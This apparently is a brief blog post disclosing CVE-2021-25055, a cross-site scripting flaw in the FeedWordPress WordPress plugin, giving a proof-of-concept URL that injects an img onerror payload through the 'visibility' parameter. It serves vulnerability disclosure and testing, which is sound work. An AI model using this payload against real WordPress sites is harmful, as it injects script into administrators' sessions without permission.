[CVE-2021-25055] FeedWordPress < 2022.0123- Cross-Site Scripting (Authenticated)


# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4
POC:

http://localhost/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&visibility='"><img+src=2+onerror=alert(origin)>

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: